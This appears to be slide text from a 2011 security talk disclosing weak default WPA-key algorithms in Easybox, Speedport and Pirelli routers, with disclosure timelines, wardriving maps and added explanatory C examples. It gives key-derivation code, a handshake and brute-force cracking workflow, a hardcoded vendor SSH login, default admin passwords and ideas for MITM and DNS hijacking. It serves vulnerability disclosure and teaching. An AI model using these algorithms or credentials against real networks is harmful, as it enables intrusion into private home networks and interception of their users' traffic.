
ATTENTION

thx for paying some

ViBi & 5M7X 1


ViBi & 5M7X
WLAN-Router
HORROR Stories
• Austria
• Infosec Student
• Germany
• Evil Core Bootkit
• Compscience Student
• Backtrack



NO!
• Enterprise Wifi
• Breaking WPA/WPA2
• XSS/Web
• complicated
• boring

Instead:
• SOHO a.k.a. neighbours
• Passphrase algorithms
• Wardriving + mapping
• Easy to understand
• Fun!

HISTORY
When monsters are born



NETGEAR DG834GT
• ISP in the UK
• A million customers
• 802.11 b/g enabled by default
• Key based on MAC
• admin:password <- web interface
• Public was informed 02.2008
• No details on the attack
• Maybe more devices were published
http://www.theregister.co.uk/2008/02/21/sky_broadband_wi_fi_keys_unpicked/



• French company
• Became Technicolor in 2010
  http://en.wikipedia.org/wiki/Technicolor_SA
• Public was informed 04.2008
• stkeys.c (still works)



• Android app
• Free open source project
• Written in Java
• Italian telekom complained about the tool
• No longer available via Android Market
http://code.google.com/p/android-thomson-key-solver/



FUNNY
News from planet earth



http://www.darknet.org.uk/2011/03/dutch-court-rules-wi-fi-hacking-legal-in-holland/




http://www.nsa.gov/ia/_files/factsheets/Best_Practices_Datasheets.pdf [April 2011] pages 6-7



doing it wrong

http://www.nsa.gov/ia/_files/factsheets/Best_Practices_Datasheets.pdf [April 2011] pages 6-7



WHO IS WHO
A little overview
http://www.dslweb.de/bilder/quartalsberichte/dsl-marktuebersicht-2010-4-gross.gif



none: 11.46%
WEP: 22.13%
WPA: 66.42%

http://www.wardriving-forum.de/forum/extern_parser_statistiken.php [15.05.2011]



AVM (27.6%)
Arcadyan (15.5%)
Netgear (7.6%)
D-Link (7.2%)
ZyXEL (5.0%)
others < 5%

http://www.wardriving-forum.de/forum/extern_parser_statistiken.php [15.05.2011]



FREENET/1&1
Devices not of this earth



• 3rd biggest ISP in Germany
• DSL hoster
• Mobile phones
• Belongs to United Internet
• Freenet -> 1&1
• Device was shipped by Freenet
• Freenet was taken over by 1&1 in 2009



WPA-Key Problem
• No skills/reversing needed
• Linux based OS
• 802.11 b/g enabled by default
• Webinterface: No password!
• VoIP/analog/ISDN
• Room monitor feature
• Key is the last six chars of the internal MAC
• Other suspected devices
  – G3200
  – G3220
• SSID
  – „3200 WLAN“
  – „3210 Phone WLAN SL“
  – „3220 Phone WLAN“
http://wiki.gpl-devices.org/wiki/Samsung_SMT-G3210

MAC of interest



• IEEE 802.11F a.k.a. Inter-Access Point Protocol (IAPP)
  – optional extension to 802.11
  – commonly used in a/b/g/n
  – provides roaming features
  – withdrawn in 2006
• How/why can it help us here?
http://www.proxim.com/support/techbulletins/TB-034.pdf

MAC of interest



• Class-D Target (Multicast)
• 224.0.1.0-238.255.255.255
– globally-scoped (internet-wide) multicast addresses.

http://www.tcpipguide.com/free/t_IPMulticastAddressing.htm



• Multicast on data-link layer from LAN NIC
  – 01:00:5e:xx:xx:xx
http://www.tcpipguide.com/free/t_IPMulticastAddressing.htm
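The two slides above name the class-D range and the 01:00:5e:xx:xx:xx frame addresses it maps onto. The following C program is an added example, not code from the slides, that implements the standard IPv4-multicast-to-MAC mapping and the range checks, so the relationship between the group address seen in a capture and the multicast MAC on the wire can be checked offline. The function names and the sample addresses are constructed for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides: the standard IPv4 multicast-to-MAC
 * mapping behind the 01:00:5e:xx:xx:xx addresses the slide mentions. Only the
 * low 23 bits of the group address are copied into the MAC, so 32 distinct
 * groups (e.g. 224.0.1.1 and 224.128.1.1) share one frame address. */

/* Builds a host-byte-order IPv4 address from its four octets. */
uint32_t ip4(unsigned a, unsigned b, unsigned c, unsigned d)
{
    return ((uint32_t)a << 24) | ((uint32_t)b << 16) | ((uint32_t)c << 8) | (uint32_t)d;
}

/* Class D: 224.0.0.0/4, i.e. the top four bits are 1110. */
int is_ipv4_multicast(uint32_t ip)
{
    return (ip >> 28) == 0xE;
}

/* Globally-scoped range quoted on the slide: 224.0.1.0 - 238.255.255.255
 * (excludes the link-local 224.0.0.0/24 block and the administratively
 * scoped 239.0.0.0/8 block). */
int is_global_multicast(uint32_t ip)
{
    return ip >= ip4(224, 0, 1, 0) && ip <= ip4(238, 255, 255, 255);
}

/* Maps a class-D address onto 01:00:5e + low 23 bits; returns 0 if ip is not
 * multicast and leaves mac untouched. */
int ipv4_to_multicast_mac(uint32_t ip, uint8_t mac[6])
{
    if (!is_ipv4_multicast(ip))
        return 0;
    mac[0] = 0x01;
    mac[1] = 0x00;
    mac[2] = 0x5E;
    mac[3] = (uint8_t)((ip >> 16) & 0x7F); /* bit 23 of the group is dropped */
    mac[4] = (uint8_t)((ip >> 8) & 0xFF);
    mac[5] = (uint8_t)(ip & 0xFF);
    return 1;
}

/* Returns 1 if a frame address lies in the IPv4 multicast block
 * 01:00:5e:00:00:00 - 01:00:5e:7f:ff:ff. */
int is_ipv4_multicast_mac(const uint8_t mac[6])
{
    return mac[0] == 0x01 && mac[1] == 0x00 && mac[2] == 0x5E && (mac[3] & 0x80) == 0;
}

/* Convenience wrapper: the mapped MAC as "xx:xx:xx:xx:xx:xx" in a static
 * buffer, or "" when ip is not a multicast address. */
const char *multicast_mac_str(uint32_t ip)
{
    static char buf[18];
    uint8_t mac[6];
    if (!ipv4_to_multicast_mac(ip, mac))
        return "";
    snprintf(buf, sizeof buf, "%02x:%02x:%02x:%02x:%02x:%02x",
             mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
    return buf;
}

int main(void)
{
    /* constructed sample groups: link-local, global, admin-scoped, and an
     * alias of the second one that lands on the same MAC */
    uint32_t samples[] = { ip4(224, 0, 0, 1), ip4(224, 0, 1, 1),
                           ip4(239, 255, 255, 250), ip4(224, 128, 1, 1) };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        uint32_t ip = samples[i];
        printf("%u.%u.%u.%u -> %s (globally scoped: %s)\n",
               (unsigned)(ip >> 24), (unsigned)((ip >> 16) & 0xFF),
               (unsigned)((ip >> 8) & 0xFF), (unsigned)(ip & 0xFF),
               multicast_mac_str(ip), is_global_multicast(ip) ? "yes" : "no");
    }
    return 0;
}
```

The aliasing shown by the last sample is the reason a capture filter on the 01:00:5e MAC alone cannot tell which of the 32 sharing groups a frame belongs to; the IP header has to be inspected.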

• Since it is no „bug“ there is no need to fix it?!
• Small hint on the bottom of the device that tells you to „change your key“
• Suboptimal situation. :-(



ARCOR/VODAFONE
Vodafone's deadliest accident



Arcor -> Vodafone
• British company
• Vodafone bought Arcor
• 2nd biggest ISP in Germany
• 3.5 mio. broadband customers (Q4 2010)
• Manufactured by Arcadyan
• Very widespread



• Easybox A 300
• Easybox A 400
• Easybox A 401
• Easybox A 600
• Easybox A 601
• Easybox A 800
• Easybox A 801
• Easybox 402
• Easybox 602
• Easybox 802
• Easybox 803

• Manufactured by Arcadyan
• Runs proprietary OS made by Arcadyan
• Distribution (at least) since 2006
• Customers forced to use Easybox (VoIP, …)
• Webinterface:
  – root:1234
  – root:123456
• SSID:
  – Easybox-XXXXXX
  – Arcor-XXXXXX
  – Vodafone-XXXXXX

• WPA key is based on
  – MAC
  – serial number
• MAC = BSSID
• Serial number is based on MAC ;-)

char mac[6]   0x00 0x1D 0x19 0x8F 0xFF 0xFF
char sn[10]   0 0 0 0 0 6 5 5 3 5        (ToDec: 0xFFFF -> 65535, zero-padded)



/* keeps only the low nibble of k: k - (k & ~0xF) == k & 0xF */
char calc_k(int k)
{
    int tmp = k;
    tmp >>= 4;
    tmp <<= 4;

    k -= tmp;
    k &= 0xFF;
    return k;
}

char k1 = calc_k(mac_str[10] + mac_str[11] + sn[6] + sn[7]);
char k2 = calc_k(mac_str[8]  + mac_str[9]  + sn[8] + sn[9]);



key[0] = k1 ^ sn[9];
key[1] = k2 ^ mac_str[9];
key[2] = mac_str[10] ^ sn[9];
key[3] = k1 ^ sn[8];
key[4] = k2 ^ mac_str[10];
key[5] = mac_str[11] ^ sn[8];
key[6] = k1 ^ sn[7];
key[7] = k2 ^ mac_str[11];
key[8] = k1 ^ k2;

sprintf(wpa_key, "%1X%1X%1X%1X%1X%1X%1X%1X%1X",
        key[0], key[1], key[2], key[3], key[4], key[5], key[6], key[7], key[8]);

[Diagram: "usual" way vs. their way: enhanced privacy!]



[Diagram: MAC -> SN = T(MAC) -> K1, K2]

• None on the sticker
• None on the homepage
• None in the manual



• Bug discovered 04.03.2011
• Bug verified 05.03.2011
• 31.03.2011 Vodafone was informed
  – …that this will be presented at a "sec-con" in Berlin by the end of May.
  – Vodafone confirmed that they will reproduce this on their own. Good luck!
• NO reaction as of today?!
• No firmware updates

Don't you Vodafone rebels down there think that this is worth some beer!?



D-TELEKOM
Half taiwan. Half german. All fail



• Derived from the „Post“ a.k.a. „Bundespest“
• Biggest ISP in Germany
• 54% DSL market share
• Backbones
• Mobile telephony infrastructure
• Telephone infrastructure



http://www.h-online.com/security/news/item/WPA-key-of-Speedport-routers-too-simple-1063308.html



http://www.h-online.com/security/news/item/WPA-key-of-Speedport-routers-too-simple-1063308.html

NO, It‘s from Hitachi.



• Arcadyan Device
• WIFI 802.11b/g
• Atheros/Madwifi-drivers
• SSID hidden by default
• Webinterface
– 0000
• Key based on mac + SN
• Proprietary OS
• MIPS CPU



• Arcadyan device
• Wifi 802.11b/g
• WPA/WPA PSK
• Webinterface
– 0000
• Atheros/Madwifi-drivers
• Proprietary OS
• MIPS CPU



• W 303V (Type A)
• W 500
• W 502V
• W 503V (Type C)
• W 504V
• W 700V
• W 720V
• W 722V (Type B)
• W 723V (Type B)

• Manufactured by Arcadyan (Taiwan)
• Runs proprietary OS
• Distribution (at least) since 2006
• SSID:
  – WLAN-XXXXXX



• WPA key is based on
  – MAC
  – serial number
• MAC = BSSID
• Serial number is unknown ;-(
• Parts of the serial number are used in the SSID :-)

sprintf(ssid, "WLAN-%c%c%c%c%c%c",
        mac_str[6], mac_str[7], mac_str[8], mac_str[9],
        sn[5], sn[9]);



snprintf(wpa_key, 12, "SP-%c%c%c%c%c%c%c%c%c",
         sn[5], sn[8], sn[9],
         mac_str[9], mac_str[10], mac_str[11],
         sn[4], sn[7], sn[8]);

Devices: W 303V (Type A), W 500V, W 502, W 700V, W 720V
Unknown (???): sn[4], sn[7], sn[8]

NEW™:
snprintf(wpa_key, 16, "%c%c%c%02d%02d%02d%c%c%c%02d%02d",
         sn[5], sn[8], sn[9],
         mac_str[9], mac_str[10], mac_str[11],
         sn[4], sn[7], sn[8],
         mac_str[7], mac_str[8]);

Devices: W722 (Type B), W504V
Unknown (???): sn[4], sn[7], sn[8]



YES! / NO!

SSID          BSSID               SN           KEY
WLAN-9EC812   00:12:BF:9E:C8:40   J634317932   SP-132840393
WLAN-81DD62   00:12:BF:81:DD:A7   J619366492   SP-692DA7349
WLAN-C9D903   00:12:BF:C9:D9:42   J642302023   SP-023942302
WLAN-8FF093   00:12:BF:8F:F0:41   J625390063   SP-963041306
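The SSID formula and the table above show that a factory-default Speedport announces four hex digits of its own BSSID in its SSID. The following C program is an added example, not code from the slides, that turns that observation into an inventory check a network owner can run over their own scan results: it flags SSIDs that still follow the "WLAN-" + mac_str[6..9] + two-digit pattern, i.e. routers that are most likely still on the factory-derived key and should get an SSID and passphrase of their own. The function and type names are constructed; the sample scan list reuses two rows from the table plus two constructed entries.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides: an inventory check for the Speedport
 * default naming scheme. A match means the SSID is still the factory one, and
 * with it (per the slides) the factory-derived WPA key. */

/* Copies the 12 hex digits of "aa:bb:cc:dd:ee:ff" (or "aabbccddeeff") into
 * out as upper case; returns 0 on anything that is not a 48-bit address. */
static int bssid_to_hex(const char *bssid, char out[13])
{
    int n = 0;
    for (const char *p = bssid; *p; p++) {
        if (*p == ':' || *p == '-')
            continue;
        if (n == 12 || !isxdigit((unsigned char)*p))
            return 0;
        out[n++] = (char)toupper((unsigned char)*p);
    }
    if (n != 12)
        return 0;
    out[12] = '\0';
    return 1;
}

/* Returns 1 if ssid has the form "WLAN-" + mac_str[6..9] + two decimal digits
 * for this bssid, 0 otherwise (including malformed input). */
int speedport_default_ssid(const char *ssid, const char *bssid)
{
    char hex[13];
    if (!bssid_to_hex(bssid, hex))
        return 0;
    if (strlen(ssid) != 11 || strncmp(ssid, "WLAN-", 5) != 0)
        return 0;
    if (strncmp(ssid + 5, hex + 6, 4) != 0)
        return 0;
    /* the last two characters are sn[5] and sn[9]: digits of the serial number */
    return isdigit((unsigned char)ssid[9]) && isdigit((unsigned char)ssid[10]);
}

struct ap {
    const char *ssid;
    const char *bssid;
};

/* Counts the entries of a scan list that are still on the default scheme. */
int count_default_ssids(const struct ap *list, int n)
{
    int hits = 0;
    for (int i = 0; i < n; i++)
        hits += speedport_default_ssid(list[i].ssid, list[i].bssid);
    return hits;
}

int main(void)
{
    /* constructed scan result: two rows from the slide's table, one renamed
     * network on the same kind of hardware, one unrelated network */
    const struct ap scan[] = {
        { "WLAN-9EC812", "00:12:BF:9E:C8:40" },
        { "WLAN-81DD62", "00:12:BF:81:DD:A7" },
        { "Home-Office", "00:12:BF:C9:D9:42" },
        { "WLAN-9EC812", "00:1A:2A:11:22:33" },
    };
    int n = (int)(sizeof scan / sizeof scan[0]);
    for (int i = 0; i < n; i++)
        printf("%-12s %s -> %s\n", scan[i].ssid, scan[i].bssid,
               speedport_default_ssid(scan[i].ssid, scan[i].bssid)
                   ? "factory default SSID" : "custom/other");
    printf("%d of %d still on the default scheme\n", count_default_ssids(scan, n), n);
    return 0;
}
```

The last sample entry shows why the BSSID has to be compared rather than just the "WLAN-" prefix: a network that merely copied the naming style, on different hardware, is not flagged.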



• Nothing new here
• Generate a dictionary (1000 keys)
• Deauth the client to get the WPA handshake
• Bruteforce the handshake with the generated list
• Finish cracking in 5 seconds or less

• Problem: 1000 key combinations left and no client connected
• Solution: bruteforce the keyspace with EAPOL-Key #2 attempts
• via patched wpa_supplicant
  – up to 66.666 min (4 seconds * 1000 / 60)
• Custom tool needed
  – speedpwn = less than 5 min (C/Linux/aircrack-lib)

[Diagram: repeat <= 1000 times]



demo
Speedport W 700V
clientless -> speedpwn



Your Speedport W 700V has an individual SSID and encryption is set up by default with WPA/WPA2 and pre-shared key. You find the data on the label on the back of your device. We recommend you to keep the default settings.
• Heise wrote about this problem 08.2010
• Telekom was informed via several channels
  – some did not even understand the problem
  – others told us the products are out of service
• NO reaction as of today
• No firmware updates
• Some devices are still sold
  – e.g. Speedport W 504V
• Public not informed by the Telekom
• SNAFU (Situation normal all fucked up)



A1 TELEKOM AUSTRIA
Piranha Pirelli Broadband PRGAV4202N



• Used by Telekom Austria
• Also used in Switzerland
• Customers
  – 5 mio. mobile phones
  – 2.3 mio. analog lines
  – 98% of the population uses DSL



• ADSL/ADSL2+/VDSL2 support
• Linux with OpenRG router middleware
  – lots of OpenRG functionality not available
• 2 USB 2.0 ports
  – print server
  – NAS
• 2 VoIP lines
• SSHD

• Used by configuration wizard
  – configuration via SSH
  – wizard code obfuscated
  – does not check server certificate :-)
• Masquerade attack (custom OpenSSH server)
  – User: Telek0m
  – Pass: Austria&Eur0
• SSHD initially listened on WAN side (firmware V.2505)
http://www.h-online.com/security/news/item/WPA-key-of-Speedport-routers-too-simple-1063308.html



• Key entirely based on (Internal) MAC
• Internal MAC = BSSID -5



unsigned char str_garbage[] = { 0x54, 0x45, 0x4F, 0x74, 0x65, 0x6C,
                                0xB6, 0xD9, 0x86, 0x96, 0x8D, 0x34, 0x45, … };

SHA256_Update(&context, str_garbage, 32);   /* 32-byte constant first ... */
SHA256_Update(&context, mac, 6);            /* ... then the 6-byte internal MAC */
SHA256_Final(hash, &context);
supercrypt(hash);



char codebook[] = "0123456789ABCDEFGHIKJLMNOPQRSTUVWXYZabcdefghikjlmnopqrstuvwxyz"; /* 62 symbols */
unsigned int multiplier = 0x84210843;
long long int mulres;
unsigned int byte, byte_mod1, byte_mod2;
char passphrase[14];
int i;

/* the multiply/shift sequence is compiler output for byte / 62, so the loop
 * ends up indexing the codebook with hash[i] % 62 */
for (i = 0; i < 13; i++) {
    byte = hash[i];
    byte_mod1 = byte >> 1;
    mulres = (long long int) byte_mod1 * multiplier;
    byte_mod1 = mulres >> 32;
    byte_mod1 >>= 4;            /* byte / 62 */
    byte_mod2 = byte_mod1 << 5;
    byte_mod2 -= byte_mod1;     /* * 31 */
    byte_mod2 <<= 1;            /* * 62 */
    byte -= byte_mod2;          /* byte % 62 */

    passphrase[i] = codebook[byte];
}
*(passphrase + 13) = 0;
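The loop above is a good specimen of what the "Reversing 101" part of the talk is about: a decompiler hands back a multiply by a strange constant and a string of shifts, and the analyst has to recognise the idiom. The following C program is an added example, not code from the slides, that replays the decompiled arithmetic on its own and checks it against the plain expression it stands for, for every possible input byte. The function names are constructed for this example.

```c
#include <stdio.h>

/* Added example, not from the slides: the multiply/shift sequence in the
 * Pirelli loop is the idiom compilers emit for an unsigned division by a
 * constant, here 62. 0x84210843 is about 2^36 / 31, applied to byte >> 1,
 * so (((byte >> 1) * 0x84210843) >> 32) >> 4 equals byte / 62 for every
 * byte value; the remaining steps subtract 62 * (byte / 62). */

/* Step-by-step copy of the decompiled arithmetic for one input byte. */
unsigned decompiled_mod62(unsigned byte)
{
    const unsigned multiplier = 0x84210843u;
    unsigned q = byte >> 1;
    unsigned long long mulres = (unsigned long long)q * multiplier;
    q = (unsigned)(mulres >> 32);    /* high word of the 64-bit product */
    q >>= 4;                         /* q == byte / 62 */
    unsigned r = (q << 5) - q;       /* q * 31 */
    r <<= 1;                         /* q * 62 */
    return byte - r;                 /* byte - 62 * (byte / 62) */
}

/* The expression the idiom stands for. */
unsigned plain_mod62(unsigned byte)
{
    return byte % 62;
}

/* Returns 1 if the two agree for every possible input byte 0..255. */
int mod62_idiom_matches(void)
{
    for (unsigned b = 0; b < 256; b++)
        if (decompiled_mod62(b) != plain_mod62(b))
            return 0;
    return 1;
}

int main(void)
{
    printf("idiom == byte %% 62 for all bytes: %s\n",
           mod62_idiom_matches() ? "yes" : "no");
    printf("0xAB -> codebook index %u\n", decompiled_mod62(0xAB));
    return 0;
}
```

The exhaustive comparison is cheap because the input is a single byte; for wider operands the same recognition step is done by checking the magic constant against 2^k / d for small divisors d rather than by enumeration.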



• „many“ customers vulnerable
  – 1.2 mio. broadband customers total (Q1 2011 report)
  – Thomson TG585
    • algorithm published in 2008 (via GNUCITIZEN)
  – Pirelli PRGAV4202N
    • except ones with new hw-revision
• Customers are still not told to change passwords
• Contacted them in December 2010
• Acknowledged problem
  – fixed in next hw-revision
• Meeting in February
• Promised that they will inform customers
  – never happened



WARDRIVING
They run on Club-Mate and they eat access points



• IBM/Lenovo Thinkpad X60
• 2 Alfa AWUS036h with rtl8187 chipset
• 2 Omni-antennas + magnet mounts
• Navilock NL-402u gps-mouse
• Car-powersupply
• Driving-plan
• Car + driver + explanation for the cops

• Linux (BackTrack 4R2)
• GPSD
• Kismet-NG
• GISKismet
• Google maps/earth


[Chart: None / WEP / WPA]


[Chart: None / WEP / WPA / EasyBox / Speedport]


MALICIOUS INTENTS?
Horror++ for not so whitehat sissies



• Free internets
• Change DNS server
• Vpn/SSH
• MITM
– ettercap/cain&abel
– SSLtrip



• Telephony
  – SIP/VoIP sniffing/abuse
  – See incoming/outgoing calls
• Remote administration via webinterface
• Notification
  – TR-069 URL
  – firmware update URL
• Malicious firmware
  – doable on Linux (toolchain)
  – hard on proprietary systems

• Fon-AP as client
• Firmware flash
• Tripod
• Preserving jar gums
• Directional antenna
• LAN over Powerline
• 2nd AP for yourself
• Neighbour in reach
= win!


• Sharp Zaurus
• D-Link wifi adapter
• pigtail modifications
• ~18 dB antenna
• Linux + kismet
= AWESOME!

IT'S EVERYWHERE?
And nothing can stop it!



00:12:BF:XX:XX:XX
00:1A:2A:xx:xx:xx
00:1D:19:xx:xx:xx
00:23:08:xx:xx:xx
00:26:4D:xx:xx:xx
7C:4F:B5:xx:xx:xx
88:25:2C:xx:xx:xx
• France
– 00:12:bf:XX:XX:XX/belkin54g
– 00:12:bf:XX:XX:XX/WLAN
– 00:1d:19:14:71:55/TELE2BOX_1FC8
– 00:1d:19:70:b1:ae/SFR_ADSL_01783
– 00:1d:19:57:03:d7/DartyBox_20D1
– 00:1d:19:ae:82:9b/Businesslivebox_829b
– 00:23:08:2d:51:7d/CD019NLR8C_DATA
– 00:23:08:f9:8e:d1/Livebox-0914



• Denmark
– 00:1a:2a:52:89:75/WLAN-528937
– 00:1d:19:6e:9f:7e/PHILIPS_6E9F7C
• Italy
– 00:12:bf:XX:XX:XX/philips
– 00:1d:19:46:6c:22/PHILIPS_466C20
– 00:1d:19:c9:aa:57/WLAN_C9AA56
• Switzerland
– 00:12:bf:XX:XX:XX/philips
– 00:1d:19:48:51:b9/PHILIPS_4851B7
– 00:26:4d:16:fe:af/EasyBox-16FE69 <- woot!



• Netherlands (remember the court-decision)
– 00:12:bf:XX:XX:XX/belkin54g
– 00:12:bf:XX:XX:XX/Philips WiFi
– 00:1a:2a:9d:f6:a5/CIA67209df6a3
– 88:25:2c:ec:e9:c7/ARV7519ECE9C7
– 00:1a:2a:9d:fe:f5/ WiFi_F5
• Spain (ya.com already pwned!)
– 00:26:4d:49:b5:3e/WLAN9B5962
– 88:25:2c:92:53:fe/WiFi253965
– All with SSID: YACOMXXXXXX as well
• Uk
– 00:12:bf:XX:XX:XX/belkin54g
– 00:12:bf:XX:XX:XX/philips
– 00:12:bf:XX:XX:XX/TalkTalk_install
– 00:1a:2a:XX:XX:XX/MicradigitalWLAN
– 00:1d:19:90:c7:75/PHILIPS_90C773
– 00:12:bf:31:b7:8e/WLAN_31B78C
– 00:26:4d:01:d4:08/Thomson01D408
– 00:26:4d:59:4b:b0/Thomson594BB0-Tesco Broadband
– 00:26:4d:b1:9f:47/VodafoneSharingDock_B19F45



• US
– 00:12:bf:XX:XX:XX/SecureConnect
– 00:12:bf:XX:XX:XX/linksys
– 00:1a:2a:XX:XX:XX/fortinet
– 00:12:bf:14:fa:46/FGT01
– 00:12:bf:3c:5f:5d/07B404364473
– 00:23:08:0e:7c:00/00:23:08:0E:7C:00



REVERSING 101
The dead code that lives!!!



• Unpack firmware
• Load it into IDA
• Find load address
• Learn MIPS :)
• Static analysis
• Write algorithm in C



• RISC
• 32-bit instruction size
• lots of registers
• Big/Little endian
• used in a lot of routers



• Arguments
  1. $a0 - $a3
  2. $t0 - $t3
  3. stack
• Return value
  – $v0



QUESTIONS ?!
you should ask them before we are too drunk!



• FX & phenoelit for the honour to speak on #phNeutral
• You for spending your time and attention on this talk
• Belial for crossreading and giving us the guts!
• Thomas Kessler for the Speedport firmware unpacker!
• Andi_84 for Speedport firmware unpacker #2!
• Gnoxter for speedpwn development and latenight debugging sessions!
